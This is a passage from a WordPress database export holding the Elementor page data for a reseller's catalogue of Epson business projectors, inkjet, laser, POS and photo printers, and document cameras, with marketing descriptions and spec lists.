Work<\\/h1><p>Epson has the best projector for your business, from education solutions to conference room projectors.<\\/p><h3>\\u00a0<\\/h3><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><ul><li>\\u00a0<\\/li><\\/ul><h3>\\u00a0<\\/h3><h3>ULTRA PORTABLE<\\/h3><ol><li>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/li><\\/ol><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><h3>INTERACTIVE<\\/h3><ol><li>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/li><\\/ol><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><p>2.\\u00a0Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><h3>HIGH BRIGHTNESS<\\/h3><ol><li>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/li><\\/ol><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><p>2.\\u00a0Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><p>3.\\u00a0Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><h3>DOCUMENT CAMERAS<\\/h3><ol><li>Document Camera ELPDC21\\u00a0<img class=\\\"alignnone wp-image-2444\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/li><\\/ol><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3928,2747,'_elementor_version','0.4'),(3931,2748,'_wp_page_template','template-fullwidth.php'),(3932,2748,'_elementor_edit_mode','builder'),(3933,2748,'_elementor_template_type','post'),(3934,2748,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone 